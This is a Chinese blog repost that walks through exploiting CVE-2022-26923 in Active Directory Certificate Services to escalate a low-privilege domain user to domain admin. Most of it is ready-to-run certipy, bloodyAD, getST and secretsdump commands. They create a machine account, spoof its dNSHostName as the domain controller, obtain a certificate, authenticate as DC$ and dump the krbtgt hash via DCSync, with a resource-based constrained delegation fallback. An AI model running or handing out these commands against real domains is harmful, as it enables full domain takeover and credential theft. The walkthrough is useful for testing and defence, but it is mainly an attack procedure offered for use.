当前位置: 首页 > news >正文

ADCS攻击之CVE-2022–26923

CSDN自动博客文章迁移

漏洞简介

该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。

漏洞利用

添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:

certipy account create -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win@123456 -dns 'dc.attack.cn'

用该机器账户向ADCS请求证书:

# TARGET为ADCS机器IP

certipy req -u 'hacker$'@attack.cn -p win@123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine

用申请的证书请求DC$的TGT:

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

用DC$的nthash去DCSync:

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

使用bloodyAD 攻击

# 查询MAQ的属性

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

# 新增计算机账号

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123

# 设置新增的机器账号的属性DNSHostName指向AD的属性值

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute 'CN=cremem,CN=Computers,DC=attack,DC=cn' dNSHostName '["dc.attack.cn"]'

# 查看dNSHostName属性的指向

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' dNSHostName

# 运行Certipy生成机器证书,可以看到DNSHostName 已经变成了dc.attack.cn

certipy req 'attack.cn/cremem$:pass123@dc.attack.cn' -ca ATTACK-ADCS-CA -template Machine

# 用申请的证书请求DC$的TGT

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

# 用DC$的nthash去DCSync

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

如果使用certipy请求TGT失败,还可以设置RBCD来攻击:

openssl pkcs12 -in dc.pfx -out dc.pem -nodes

python3 bloodyAD.py -c ':dc.pem' -u 'win$' --host 192.168.11.11 setRbcd 'hacker$' 'dc$'

getST.py attack.cn/'hacker$':'win@123456' -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11

export KRB5CCNAME=administrator.ccache

secretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt

转载请注明:Adminxe's Blog » ADCS攻击之CVE-2022–26923

http://www.lryc.cn/news/31629.html

相关文章:

  • AO3401-ASEMI低压P沟道MOS管AO3401
  • 【STM32MP157应用编程】3.控制PWM
  • 基于Python的selenium
  • Go底层原理:一起来唠唠GMP调度(一)
  • 前端——1.相关概念
  • java四种线程池(基本使用)
  • float的表示范围为什么比long大
  • Flutter Android 打包保姆式全流程 2023 版
  • C++笔记之lambda表达式
  • flink大数据处理流式计算详解
  • Java面试题(二十三)DCL单例
  • UML-类图
  • PostgreSQL 数据库和 pgAdmin 4
  • quarkus 搭建与基础开发环境配置总结
  • 扩散模型DDPM开源代码的剖析【对应公式与作者给的开源项目,diffusion model】
  • C语言 学生记录管理系统
  • 【独家】华为OD机试 C 语言解题 - 交换字符
  • 网络安全平台测试赛 easyphp(phar脏数据处理)
  • 【python】XML格式文件读写详解
  • 理解js的精度问题
  • 蓝桥杯 时间显示
  • qt中设置菜单高度
  • 测开:前端基础-css页面布局-定位
  • Servlet中八个监听器介绍
  • LicenseBox Crack,对服务器的要求最低
  • css中重难点整理(vertical-align)
  • javaScript基础面试题 ---宏任务微任务
  • 基于JSP的网上书城
  • C#教程 05 常量
  • 【华为OD机试真题java、python】基站维修工程师【2022 Q4 100分】(100%通过)